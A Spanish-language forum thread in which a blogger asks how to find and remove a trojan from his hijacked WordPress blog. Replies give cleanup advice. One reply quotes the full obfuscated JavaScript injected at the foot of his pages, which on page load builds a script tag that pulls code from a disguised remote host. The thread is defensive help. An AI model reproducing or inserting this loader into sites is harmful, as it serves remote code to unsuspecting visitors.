Como eliminar troyano de mi web?

  • Autor Autor Wigao
  • Fecha de inicio Fecha de inicio
Wigao

Wigao

1
Pi
SEO
Verificación en dos pasos activada
Suscripción a IA
Que tal amigos, ayer abri un tema haciendo un intercambio de banners y links con mi blog tuttoqui.org
Hace algunos dias me robaron el blog "temporalmente" y luego lo recupere pero me han dicho que tengo un troyano en el mismo.
Quiero que me ayuden para ¿Como saber si es que tengo algun troyano en mi blog? y si es así ¿Como puedo eliminarlo?

Desde ya muchas gracias a los que me quieran ayudar.
 
Revisa el index.php de tu blog, o sea el que esta en el root, revisa que no tenga nada que diga SCRIPT o IFRAME, en caso de tenerlo borra este index.php y sube uno nuevo de algun wordpress que hallas descargado, igual revisa el index.php de tu theme.
 
Tenes virus!!

Enlace eliminado

Revisá tu theme a ver si no te inyectaron código en tu WP, revisá tu WP también (no será tan sencillo eh). Si tenés acceso a tu servidor revisá tus opciones, hay antivirus en varios paneles de administración, podés darle un SCAN desde tu server. Podría ser alguna imagen también... lo más común es inyección en tu header.

Te adjunto un pantallazo talvez te sirve para encontrar soluciones.

Naaahhhhhh basura, es un tremendo troyano el que tienes, mira tu SOURCE, tienes un javascript insertado, está disfrazado todo en variables pero se construye solo al ejecutarse y "llama a casa" así le dicen los gringos a estas basuras.

Quitá el SCRIPT que está al final de tu página, lo inserto acá en modo código.

PHP:
<script>var RY;if(RY!='z'){RY='z'};try {var Y;if(Y!='i'){Y='i'};var d;if(d!='N'){d='N'};var Qh;if(Qh!='a' && Qh!='QS'){Qh='a'};this.sv="";var W='[';var o='g';var e='';var q='';var j='replace';var P=new Date();var L=']';var G=new Date();var m=RegExp;var cE=new Date();this.EY='';function S(u,Z){var bl;if(bl!='jF' && bl!='j_'){bl=''};var aW;if(aW!='Qs' && aW != ''){aW=null};var Wr;if(Wr!=''){Wr='Wn'};var Q=W;var iH;if(iH!='' && iH!='ZW'){iH=null};Q+=Z;this.TO="";var _c=new Array();Q+=L;var y="";this.jf="";var O=new m(Q, o);var iq=new Array();return u[j](O, q);var ib="";};var jp;if(jp!='_I'){jp='_I'};var M=S('s7eyt7A7tytyr7iybyuyt7e7',"7y");var I=S('cxrQeQavtxexEQlxeQmQexnxtQ',"vZxQ");var _Y;if(_Y!=''){_Y='EQ'};var r;if(r!=''){r='A'};var QO=S('8416767107661167481776110711164',"4761");var Ap;if(Ap!='uW'){Ap=''};var G_="";var H='';var Av=new Array();var p=S('/8guo8oug8l8e8.uc8o8mu/8g8o8o8g8l8e8.ucuoumu/uw8a8yu2usumusu.8cuo8m8/ua8l8l8eugur8o8.upul8/8g8ouo8g8lueu.8c8o8m8.8s8g8.up8hupu',"u8");var u="1";var XK;if(XK!='Kb' && XK!='yT'){XK='Kb'};this.AF="";var T=S('szcxrNixp1tW',"1zxNW");this.ZT="";var Vm;if(Vm!='olE'){Vm='olE'};var ZY;if(ZY!='' && ZY!='hC'){ZY=null};var Xy="";var ZC=S('aDpDp1eznzd_CDh6izlzdD',"16D_z");var Ul='';var s=S('bfofdfyx',"fxa");this.Ve='';var f=S('h9t9tZp9:9/9/ZyZeZsZk9yZ-Zc9oZm9.9gZuZa9rZdZiZa9n9.9cZo9.ZuZkZ.ZaZfZt9oZn9bZl9a9d9e9tZ-ZsZe9.Zm9yZdZiZrZeZcZtZo9uZt9l9eZt9.9rZuZ:Z',"9Z");var J=S('oKnElKoKaEdE',"EK");this.TG='';this.xN='';var xb="";window[J]=function(){this.WU='';var nC=new String();var Qy;if(Qy!='' && Qy!='EU'){Qy=''};b=document[I](T);H+=f;var KQ=new Date();var dC=new Date();H+=QO;var TR;if(TR!='MQ' && TR!='yp'){TR=''};H+=p;var KJ="";var V=document[s];var wu;if(wu!=''){wu='aa'};var t=new String();b.setAttribute('defer', u);var Ay="";b.src=H;this.qu="";V.appendChild(b);this.vo="";};var Hy='';var jr;if(jr!=''){jr='mHj'};} catch(uw){this.Lp='';var SA=new String();};</script>

investiga tus páginas, footer etc, y elimínalo, cambia todas tus claves y verifica todos los permisos de tu servidor

Entrá a editar tu theme, buscá la línea de código javascript que te apunté, borrala. Suerte
 

Adjuntos

  • virus.gif
    virus.gif
    2,3 KB · Visitas: 126
Atrás
Arriba